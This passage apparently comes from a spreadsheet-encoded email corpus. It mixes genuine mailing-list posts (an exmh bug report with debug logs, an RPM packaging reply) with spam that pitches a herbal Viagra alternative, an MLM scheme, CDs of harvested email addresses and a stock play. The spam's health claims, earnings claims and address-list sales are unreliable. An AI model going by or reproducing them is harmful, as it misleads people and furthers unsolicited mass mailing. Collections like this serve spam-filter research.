     &lt;TD align=right width=94&gt;&lt;EM&gt;E-mail&lt;/EM&gt;&lt;/TD&gt;
     &lt;TD width=591&gt;&lt;INPUT maxLength=25 size=25 name=Contact_mail&gt; &lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD align=right width=94 height=52&gt;&lt;EM&gt;ڭnR &lt;/EM&gt;&lt;/TD&gt;
     &lt;TD width=591 height=52&gt;
       &lt;P&gt;&amp;nbsp; &lt;INPUT type=radio CHECKED value=3~--3200 name=need&gt; 3~--3200  
       &lt;INPUT type=radio value=1~--1600 name=need&gt; 1~--1600  
 &lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;DIV align=center&gt;
 &lt;P&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;zĳ_QN&lt;/P&gt;
 &lt;P&gt;(Чi{bxZzYvD)&lt;/P&gt;&lt;/DIV&gt;
 &lt;DIV align=center&gt;
 &lt;P&gt;&lt;TEXTAREA name=zĳ_QNG rows=6 cols=70&gt; &lt;/TEXTAREA&gt;&lt;/P&gt;&lt;/DIV&gt;
 &lt;DIV align=center&gt;
 &lt;P&gt;&lt;INPUT type=submit value="HX (Submit)"&gt; &lt;INPUT type=reset value="g (Reset)"&gt; 
 &lt;/P&gt;&lt;/DIV&gt;&lt;/FORM&gt;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ALL NATURAL Viagra Alternative!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;BODY BGCOLOR=3D"#FFFFFF"&gt;
 &lt;table width=3D400 align=3Dcenter cellpadding=3D5 border=3D0&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font face=3D"arial" size=3D1.5&gt;&lt;p&gt;
 The following advertisement is being sponsored by 
 &lt;a href=3D"http://www.avirtualshopper.com"&gt;AVIRTUALSHOPPER.COM&lt;/a&gt;
 The Internets Leading source for permission based opt-in marketing&lt;br&gt;
 To Opt-Out from our mailing list&lt;a href=3D"http://www.avirtualshopper.com/=
 removeME.asp"&gt; CLICK HERE&lt;/a&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;font face=3Darial size=3D3 color=3D"#FFFFFF"&gt;&lt;p align=3D=
 "center"&gt;...&lt;/p&gt;&lt;/font&gt;
 &lt;CENTER&gt;&lt;TABLE BORDER=3D"0" CELLPADDING=3D"0" CELLSPACING=3D"0" WIDTH=3D"5=
 02"&gt;
 &lt;TR&gt;&lt;TD VALIGN=3DTOP&gt;&lt;a href=3D"http://www.hebalist.com?id=3D604"&gt;&lt;IMG SRC=
 =3D"http://www.hebalist.com/mail/1_1.jpg" width=3D"226" height=3D"183" BOR=
 DER=3D"0"&gt;&lt;/a&gt;&lt;/TD&gt;
 &lt;TD VALIGN=3DTOP&gt;
 &lt;IMG SRC=3D"http://www.hebalist.com/mail/2_1.gif" width=3D"276" height=3D"=
 183" BORDER=3D"0"&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;&lt;TD COLSPAN=3D"2" VALIGN=3DTOP&gt;&lt;a href=3D"http://www.hebalist.com=
 ?id=3D604"&gt;
 &lt;IMG SRC=3D"http://www.hebalist.com/mail/1_1-2.gif" width=3D"502" height=3D=
 "126" BORDER=3D"0"&gt;&lt;/a&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: PATCH (was: Re: Another bug)
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_1737280444P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;
 &gt; Date:  Wed, 24 Jul 2002 10:23:47 -0500
 &gt;
 &gt; Okay, I've just patched and sourced it into my running exmh, so I'll let you 
 &gt; know if anything breaks.
 I have a folder that contains one unseen message and nothing else.  I select 
 the folder from flist:
 11:17:40 ****************
 11:17:40 Changing to Housekeeping/Monitor ...
 11:17:40 Scan_CacheUpdate error {bad text index ".0"}
 11:17:40 Scan_CacheUpdate {952 microseconds per iteration}
 11:17:40 Exmh_CheckPoint {1409 microseconds per iteration}
 11:17:40 {loading .xmhcache}
 11:17:40 Ftoc_Reset Housekeeping/Monitor has 0 msgs
 11:17:40 scan +Housekeeping/Monitor last:1000
 11:17:40 Ftoc_Reset Housekeeping/Monitor has 1 msgs
 11:17:40 Ftoc_ShowSequences Housekeeping/Monitor
 11:17:40 unseen: 1
 11:17:40 Scan_Folder {76527 microseconds per iteration}
 11:17:40 Flist_Done
 11:17:40 4 unread msgs in 3 folders
 11:17:40 Scan_CacheUpdate error {bad text index ".0"}
 11:17:40 Housekeeping/Monitor
 11:17:40 Mh_SequenceUpdate Housekeeping/Monitor clear cur {} public
 11:17:40 Folder_Change Housekeeping/Monitor {162590 microseconds per iteration}
 11:17:42 BackgroundCheckup
 I select the message.
 11:17:54 Msg_Pick line=1
 11:17:54 Msg_Change id=1
 11:17:54 Mh_SetCur +Housekeeping/Monitor cur 1
 11:17:54 Mh_SequenceUpdate Housekeeping/Monitor replace cur 1 public
 11:17:54 Ftoc_ShowSequences Housekeeping/Monitor
 11:17:54 cur: 1
 11:17:54 unseen: 1
 11:17:54 Ftoc_RescanLines {16313 microseconds per iteration}
 11:17:54 FastPath part=0=1
 11:17:54 Msg_TextHighlight 7.0 9.0
 11:17:54 Widget_TextPad h=64 last=65.0 top=3.0
 11:17:54 
 11:17:54 FlistUnseenFolder Housekeeping/Monitor
 11:17:54 {In FlagInner spool iconspool labelup}
 11:17:54 {Setting flag bitmap to iconspool}
 11:17:54 {Set flag state to spool}
 11:17:55 Mh_SequenceUpdate Housekeeping/Monitor del unseen 1 public
 11:17:55 {}
 11:17:55 
 11:17:55 Msg_Change {248654 microseconds per iteration}
 I delete the message.
 11:18:27 Msg_Remove Ftoc_RemoveMark
 11:18:27 Msg_Remove l=1 m=1
 11:18:27 Ftoc_RescanLines {15914 microseconds per iteration}
 11:18:27 Mh_SequenceUpdate Housekeeping/Monitor clear cur {} public
 11:18:27 Ftoc_RescanLines {15278 microseconds per iteration}
 11:18:27 
 11:18:27 Changes pending; End of folder
 I click on commit and the message remains in my ftoc even though it's deleted.
 11:18:43 Mh_SequenceUpdate Housekeeping/Monitor del unseen 1 public
 11:18:43 {}
 11:18:43 Committing 1 changes...
 11:18:43 Ftoc_RescanLines {14595 microseconds per iteration}
 11:18:43 Mh_SequenceUpdate Housekeeping/Monitor clear cur {} public
 11:18:43 Mh_Rmm 1
 11:18:43 BgAction {Rmm Housekeeping/Monitor} {Mh_Rmm Housekeeping/Monitor 1}
 11:18:43 BackgroundPending {Rmm Housekeeping/Monitor}
 11:18:43 ok
 11:18:43 Scan_CacheUpdate error {bad text index ".0"}
 11:18:43 Scan_CacheUpdate {1071 microseconds per iteration}
 11:18:43 BackgroundComplete {Rmm Housekeeping/Monitor}
 11:18:43 background actions complete
 I also noticed a few  references to ftoc(curline) instead of ftoc(curLine).
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_1737280444P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9PtcGK9b4h5R0IUIRAtPnAJ9GGJF16cJnH+bsHRKi+FwcxHtJogCdHk8F
 2JygBKhDfRFXvfn6l6hhxN0=
 =Ek5X
 -----END PGP SIGNATURE-----
 --==_Exmh_1737280444P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Saou wrote:
 &gt; Well, I don't really find it consistent at all to use an rpm package
 &gt; built against something that wasn't installed through rpm :-/
 Oh well.  Fair enough.
 &gt; What I'd recommend in your case [...]
 Ugh, way too much manual labor.  :-)
 What I've done instead is to create a tiny little "kernel.spec" that
 installs no files but claims to produce a kernel package having version
 number `uname -r` for architecture `uname -p`.  It also claims to
 provide kernel-sources at the same version.  That is enough to make
 alsa-driver.spec happy, and at least forms a reasonable representation
 of what my homemade kernel provides to the system.  I should have
 thought of this approach sooner.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Public Notice, Immune Support              25834
</t>
  </si>
  <si>
    <t xml:space="preserve">If you haven't already read the #1 NY Times Best Seller Rich Dad, 
 Poor Dad by Robert T. Kiyosaki...
 I highly recommend it. In this book, he talks about how the
 only way to become wealthy is to go into business for yourself. 
 "Mind your own business",as he puts it.
 "The greatest entrepreneurial opportunities will be in DISTRIBUTING 
 rather than in manufacturing wellness products" 
 "The Health &amp; Wellness
 Industry will become a trillion dollar industry by 2010."
 -Paul Zane Pilzer, Leading Economist, author of "The Next Trillion"
 Dr .Charles King professor of marketing, University of IL
 Chicago and entrepreneur Tim Sales who earns in excess of 25
 Million annually from over 24 countries, teach an accredited course
 on how to recognize a professional business model when you see one, 
 and here is what they said.
 There are 4 principals of a business that are essential
 Huge Expanding Market, Unique Consumable Product Timing / 
 Trends, Employ others
 Our company meets ALL 4 business principals with A+++
 Learning More Is As Easy As 123.
 Send an email to: care4family@excite.com
 You only have to supply us with
 Name, Phone Number and Best Time
 to Reach You.
 get off this DB email me at publicservice1@btamail.net.cn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 200 Million Targeted Leads CD * ONLY $99.95 *
</t>
  </si>
  <si>
    <t xml:space="preserve">
 You Can't Beat This Deal:
 200 Million email addresses Database, On 2 CDs!! ==Only $99.95==
 100 million email addresses Database, On CD ==Only $69.95==
 1.5 Million USA Business FAX NUMBERS, On CD ==Only $49.95==
 ALL THREE DIRECTORIES ABOVE *** ONLY $139.95 ***
 BOTH EMAIL DIRECTORIES ARE CATEGORIZED LIKE:
 * Persons running home businesses or interested in starting one
 * Persons interested in buying things on the web 
 * Persons interested in investing online or offline
 * All 50 States broken down by area code
 * Persons interested in Health &amp; Fitness products / services
 * Opt in : Persons interested in recieving offers by email.
 * Persons interested in Travel, Sports, Dining, Real Estate, Mortgage, Politics, Religion, Fishing, Trade Shows etc..
 * Many More Categories...
 ** Contains US &amp; International EMAILS ** 
 ** Everything on these disks are in TEXT file format and fully exportable. **
 ** The CD is as easy to use as browsing your C drive in Explorer. **
 NOW YOU CAN ADVERTISE FREE AND GET TREMENDOUSLY
 MORE RESPONSES THAN ADVERTISING WITH OTHER FORMS OF MEDIA!! ORDER NOW
 HOW THIS DIRECTORY WAS COMPILED:
 * Virtually every other email directory on the Internet was taken and put it through an extensive email verification process thus eliminating all the dead addressess.
 * Special software spiders through the web searching websites, newsgroups and many other online databases with given keywords like area codes, industries, city names etc.. to find millions of fresh new addresses every week.
 TURN YOUR COMPUTER INTO A MONEY MACHINE!
 Most estimate well over 400 MILLION people will have E-mail accounts in the next 2Years! E-Mail turns your computer into a Money Machine by giving you FREE, immediate access to all of them. Don't you think some of the more than 200 million people with E-mail addresses would be interested in your products or Services?
 MUCH FASTER:  With bulk E-mail you get responses back in 1 to 4 days instead of waiting weeks or months!  You can begin filling orders the same day you send E-mail. FREE ADVERTISING WORTH MILLIONS:  It costs millions of dollars to mail.
 DO NOT REPLY TO THIS EMAIL ADDRESS. TO ORDER, READ BELOW:
 ** ORDER BY CREDIT CARD (VISA, MASTERCARD OR AMERICAN EXPRESS) **
 - Simply complete the order form below and fax it back to 1-240-371-0672
 Make sure that we have your email address so that we can send you a reciept for your transaction.
 ORDER BY MAIL:
 Print the form below and send it together with a money order payable to FUTURE TECH INTERNATIONAL for the balance to:
 FUTURE TECH INTERNATIONAL
 Import Export Company
 1300 Don Mills Road Suite 211
 Don Mills Ontario, Canada 
 M3B 2W6
 PLEASE DO NOT SEND POSTAL MONEY ORDERS
 ORDER FORM:
 Please PRINT clearly
 Full Name:________________________________________________
 Company Name:_____________________________________________
 Telephone:________________________________________________
 Fax:______________________________________________________
 Email Address:__________________________________________* REQUIRED FIELD
 Shipping Address:______________________________________________
 City:____________________ State/Province:________________
 Country:_________________________ZIP/Postal:_____________
 Shipping Options: 
 []  $5.95 Regular Mail (1 - 2 weeks)
 []  $12.95 Priority Mail (2-4 business days) 
 []  $25.95 Fedex (overnight) For US &amp; Canada Only - Int'l orders extra 
 Product:
 [] Email Marketing CDROM with 100 million Addresses $69.95 USD
 [] 200 MILLION EMAIL ADDRESSES on 2 CD's $99.95
 [] 1.5 Million USA Business Fax Numbers $49.95 USD
 [] COMBO PACKAGE - ALL DIRECTORIES ABOVE (3 CD's) $139.95 USD
 TOTAL:  $_________ USD
 ======================================================================================
 [] Credit Card Order    [] Mail Order
 CREDIT CARD ORDERS FAX THIS ORDER FORM BACK TO 1-240-371-0672
 Card #:___________________________________________________
 Expiry Date: ______________ 
 Type of Card [] VISA  [] MASTERCARD  [] AMERICAN EXPRESS
 Name on Card:_____________________________________________
 Billing Address:_________________________________ZIP/Postal: ____________
 City:_____________________State/Province:_______________ Country:_____________
 Last 3 digits on reverse of card next to signature:    [       ]   -   [       ]  -  [       ]
 Cardholder Signature:______________________________________
 Please note that FT International will appear on your statement.
 =======================================================================================
 For any questions please feel free to call us at 1-416-410-9364
 To be removed from our database please send a fax to 1-970-289-6524 
</t>
  </si>
  <si>
    <t xml:space="preserve">Wayne E Baisley wrote:
 &gt; There's nothing you can know that isn't known.
 &gt; Nothing you can see that isn't shown.
 &gt; Nowhere you can be that isn't where you're meant to be.
 &gt; It's easy.
 &gt; All you need is HTML.
 Are you quoting the Beatles version or the Laibach version?
 - Joe :-)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fill a Room with 300 People
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_385302_01C20675.6F2940B0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Would you like to fill a room with 300 of these people?	
  ...that's what we do!	
 End All Senior Market Prospecting Problems Instantly and Painlessly! 
   _____  
 Get record breaking results with the USA Financial Turnkey, Worry-Free
 Auto-Pilot Client Seminar Marketing System and Formula! Use the same
 methods we used to get 20,898 RSVP's in only 15 short months. Learn our
 secret Asset-Cycle Sales Presentation that earns $10,000-$30,000 per
 client, and get free attendance to our 2-day coaching adacemy! Learn our
 coveted secrets to Easily and Consistently Collect Millions &amp; Millions
 in assets! 
 ?	 Average of 131 RSVP's per seminar...Over 200 Seminars Conducted
 ?	 Average of 80% Attendance Ratio &amp; 60% Appointment Ratio
 ?	 Some Actual Sample RSVP's: 337 IL, 194 FL, 196 TX, 221 WI, 151
 CA, 220 PA, 158 GA	 
 ?	 Shared Statistics on Over a Year's Worth of Seminar Performance
 ?	 380 Testimonials from other Financial Advisors, Reps &amp; Agents
   _____  
 Call our 24-hour automated response line 
 for your FREE report and audiotape ($97 value!)
  800-436-1631 ext. 86005	
 ? or ?
 Please fill out the form below for your FREE report and audiotape!
 Name:	  	
 E-mail:	  	
 Phone:	  	
 Fax:	  	
 Address:	  	
 City:	  	State:  	Zip:  	 	
 USA Financial - www.usa-financial.com &lt;http://www.usa-financial.com&gt;  
 We don't want anybody to receive our mailings who does not wish to
 receive them. This is professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.InsuranceMail.net
 &lt;http://www.InsuranceMail.net&gt; 
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; 
 ------=_NextPart_000_385302_01C20675.6F2940B0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Free Report and Audio Tape&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#000099" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"2" cellspacing=3D"2" =
 bgcolor=3D"#000000" align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/usaf/20020402-3.gif" =
 width=3D"550" height=3D"100" alt=3D"Would you like to fill a room with =
 300 of these people?"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/usaf/20020402-2a.jpg" width=3D"398" =
 height=3D"364"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/usaf/20020402-4.gif" width=3D"550" =
 height=3D"60" alt=3D"...that's what we do!"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"3" =
 color=3D"#000066"&gt;&lt;b&gt;&lt;i&gt;&lt;br&gt;
             &lt;center&gt;
               End All Senior Market Prospecting Problems Instantly and =
 Painlessly!=20
             &lt;/center&gt;
             &lt;/i&gt;&lt;/b&gt;=20
             &lt;hr width=3D"95%" size=3D"1" color=3D"#000000" noshade&gt;
             &lt;font size=3D"2" color=3D"#000000"&gt;Get record breaking =
 results with the=20
             &lt;i&gt; &lt;font color=3D"#0000CC"&gt;&lt;b&gt;USA&lt;/b&gt;&lt;/font&gt; &lt;b&gt;&lt;font =
 color=3D"#FF0000"&gt;Financial&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;=20
             Turnkey, Worry-Free Auto-Pilot Client Seminar Marketing =
 System and=20
             Formula! Use the same methods we used to get 20,898 RSVP's =
 in only=20
             15 short months. Learn our secret Asset-Cycle Sales =
 Presentation that=20
             earns $10,000-$30,000 per client, and get free attendance to =
 our 2-day=20
             coaching adacemy! Learn our coveted secrets to Easily and =
 Consistently=20
             Collect Millions &amp;amp; Millions in assets!&lt;/font&gt;&lt;/font&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;
             &lt;font face=3D"Verdana, Arial, Helvetica, san-serif"&gt;=20
             &lt;table width=3D"100%" align=3D"center" cellpadding=3D"2" =
 cellspacing=3D"2"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"4%" align=3D"right" valign=3D"top"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;&amp;#149;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"96%"&gt;&lt;b&gt;&lt;font size=3D"2" =
 color=3D"#000066"&gt;Average of 131 RSVP's per seminar...Over 200 Seminars =
 Conducted&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"4%" align=3D"right" valign=3D"top"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;&amp;#149;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"96%"&gt;&lt;b&gt;&lt;font size=3D"2" =
 color=3D"#000066"&gt;Average of 80% Attendance Ratio &amp;amp; 60% Appointment =
 Ratio&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"4%" align=3D"right" valign=3D"top"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;&amp;#149;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"96%"&gt;&lt;b&gt;&lt;font size=3D"2" =
 color=3D"#000066"&gt;Some Actual Sample RSVP's: 337 IL, 194 FL, 196 TX, 221 =
 WI, 151 CA, 220 PA, 158 GA&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"4%" align=3D"right" valign=3D"top"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;&amp;#149;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"96%"&gt;&lt;b&gt;&lt;font size=3D"2" =
 color=3D"#000066"&gt;Shared Statistics on Over a Year's Worth of Seminar =
 Performance &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"4%" align=3D"right" valign=3D"top"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;&amp;#149;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"96%"&gt;&lt;b&gt;&lt;font size=3D"2" =
 color=3D"#000066"&gt;380 Testimonials from other Financial Advisors, Reps =
 &amp;amp; Agents&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;/font&gt;=20
             &lt;hr width=3D"95%" color=3D"#000000" size=3D"1" noshade&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"4"&gt;Call our 24-hour automated response line &lt;br&gt;
             for your &lt;font color=3D"#FF0000"&gt;FREE&lt;/font&gt; report and =
 audiotape (&lt;font color=3D"#FF0000"&gt;$97=20
             value!&lt;/font&gt;)&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/usaf/20020402-5.gif" =
 width=3D"538" height=3D"107" alt=3D"800-436-1631 ext. 86005"&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;b&gt;&amp;#151; or &lt;/b&gt;&lt;b&gt;&amp;#151;&lt;/b&gt;&lt;br&gt;
             &lt;table width=3D"100%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" bgcolor=3D"#cccccc"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"5" align=3D"center" =
 bgcolor=3D"#000066"&gt;&lt;b&gt;&lt;font size=3D"2" face=3D"Verdana, Arial, =
 Helvetica, sans-serif" color=3D"#FFFFFF"&gt;Please fill out the form below =
 for your FREE report and audiotape!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Name:&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Fax:&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"Fax" size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Address:&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"address" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;City:&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"23%"&gt;=20
                           &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"22%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;State:=20
                           &lt;input type=3D"text" name=3D"state" =
 size=3D"2"&gt;
                           &lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"20%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Zip:=20
                           &lt;input type=3D"text" name=3D"zipcode" =
 maxlength=3D"5" size=3D"5"&gt;
                           &lt;/font&gt;&lt;/td&gt;
                         &lt;td rowspan=3D"2" align=3D"center" =
 valign=3D"middle" width=3D"20%"&gt;&lt;img src=3D"http://iiq.us/images/q.gif" =
 width=3D"43" height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"23%"&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"22%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"usa@usa-financial.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"InsuranceIQ Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &amp;nbsp;&lt;br&gt;
             &lt;a href=3D"http://www.usa-financial.com"&gt;&lt;img =
 src=3D"http://iiq.us/images/usaf/20020402-6.gif" width=3D"330" =
 height=3D"90" border=3D"0" alt=3D"USA Financial - =
 www.usa-financial.com"&gt;&lt;/a&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#666666" align=3D"center"&gt;=20
       &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1" =
 color=3D"#ffffff"&gt; We=20
         don't want anybody to receive our mailings who does not wish to =
 receive=20
         them. This is professional communication sent to insurance =
 professionals.=20
         To be removed from this mailing list, &lt;b&gt;DO NOT REPLY&lt;/b&gt; to =
 this message.=20
         Instead, go here: &lt;a href=3D"http://www.InsuranceMail.net"&gt;&lt;font =
 color=3D"#FFFF00"&gt;http://www.InsuranceMail.net&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p align=3D'center'&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"1"&gt;&lt;a href=3D'http://www.insuranceiq.com/legal.htm'&gt;&lt;font =
 color=3D"#FFFF00"&gt;Legal Notice&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_385302_01C20675.6F2940B0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Major Stock Play
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta name=3D"GENERATOR" content=3D"IncrediMail 1.0"&gt;
 &lt;/head&gt;
 &lt;BODY background=3D"" bgColor=3D#ffffff style=3D"BACKGROUND-POSITION: 0px=
  0px; FONT-FAMILY: Arial; FONT-SIZE: 10pt; MARGIN: 1px" scroll=3Dyes ORGY=
 POS=3D"0"&gt;
 &lt;TABLE border=3D0 cellPadding=3D0 cellSpacing=3D0 id=3DINCREDIMAINTABLE w=
 idth=3D"95%"&gt;
 &lt;TR&gt;
 &lt;TD id=3DINCREDITEXTREGION width=3D"100%" style=3D"FONT-FAMILY: Arial; FO=
